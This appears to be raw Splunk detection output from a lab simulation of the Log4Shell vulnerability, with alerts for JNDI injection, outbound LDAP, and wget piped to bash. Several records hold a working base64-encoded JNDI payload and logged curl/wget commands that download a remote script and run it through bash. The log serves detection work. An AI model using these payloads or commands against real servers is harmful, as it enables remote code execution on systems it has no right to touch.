annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space. Note that the src_ip and dest_ip in this event are IPv4-mapped IPv6 addresses (0:0:0:0:0:ffff:a00:114 is 10.0.1.20 and 0:0:0:0:0:ffff:a00:110 is 10.0.1.16, both inside RFC1918), so the private-range exclusion must normalize ::ffff:a.b.c.d addresses or internal LDAP traffic will be reported as outbound; here the dest_ip matches the LDAP server embedded in the JNDI payload (10.0.1.16:1389) caught by the companion injection detection, which is the correlation worth confirming during triage.", src_ip="0:0:0:0:0:ffff:a00:114" 1642641551, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 3", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="T1190", annotations._all="Exploitation", annotations._all="CIS 5", annotations._all="Reconnaissance", annotations._all="Stage:Execution", annotations._all="CVE-2021-44228", annotations._all="DE.CM", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", 
annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via web calls. Many of the vulnerable Java web applications that use log4j have a web component and are especially targeted by this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a JNDI/LDAP lookup in the log4j package; its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, and when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically, it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema-accelerated searching, mainly because the second part of the detection is fairly heavy: it runs a regex across all _raw events looking for the `${jndi:ldap://` pattern across all potential web fields available in the raw data, such as HTTP headers. 
If you see results for this detection, it means that there was an attempt at an injection, which could be reconnaissance activity or a valid exploitation attempt, but this does not by itself mean that the host was successfully exploited. Note that the literal `${jndi:ldap://` pattern will not match other JNDI schemes or obfuscated variants of the lookup string, and that the base64 segment of a `/Basic/Command/Base64/` payload decodes to the command the attacker intends to run; decode it during triage and correlate with outbound LDAP and endpoint process events from the same host.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642641554, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="CIS 13", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 12", annotations._all="Actions on Objectives", annotations._all="PR.DS", annotations._all="PR.PT", annotations._all="Stage:Initial Access", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="CVE-2021-44228", annotations._all="Command and Control", annotations._all="T1059", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642641551, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 3", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="T1190", annotations._all="Exploitation", annotations._all="CIS 5", annotations._all="Reconnaissance", annotations._all="Stage:Execution", annotations._all="CVE-2021-44228", annotations._all="DE.CM", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", 
annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via web calls. Many of the vulnerable Java web applications that use log4j have a web component and are especially targeted by this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a JNDI/LDAP lookup in the log4j package; its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, and when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically, it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. 
In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema-accelerated searching, mainly because the second part of the detection is fairly heavy: it runs a regex across all _raw events looking for the `${jndi:ldap://` pattern across all potential web fields available in the raw data, such as HTTP headers. If you see results for this detection, it means that there was an attempt at an injection, which could be reconnaissance activity or a valid exploitation attempt, but this does not by itself mean that the host was successfully exploited. Note that the literal `${jndi:ldap://` pattern will not match other JNDI schemes or obfuscated variants of the lookup string, and that the base64 segment of a `/Basic/Command/Base64/` payload decodes to the command the attacker intends to run; decode it during triage and correlate with outbound LDAP and endpoint process events from the same host.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote 
file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An 
instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", 
annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
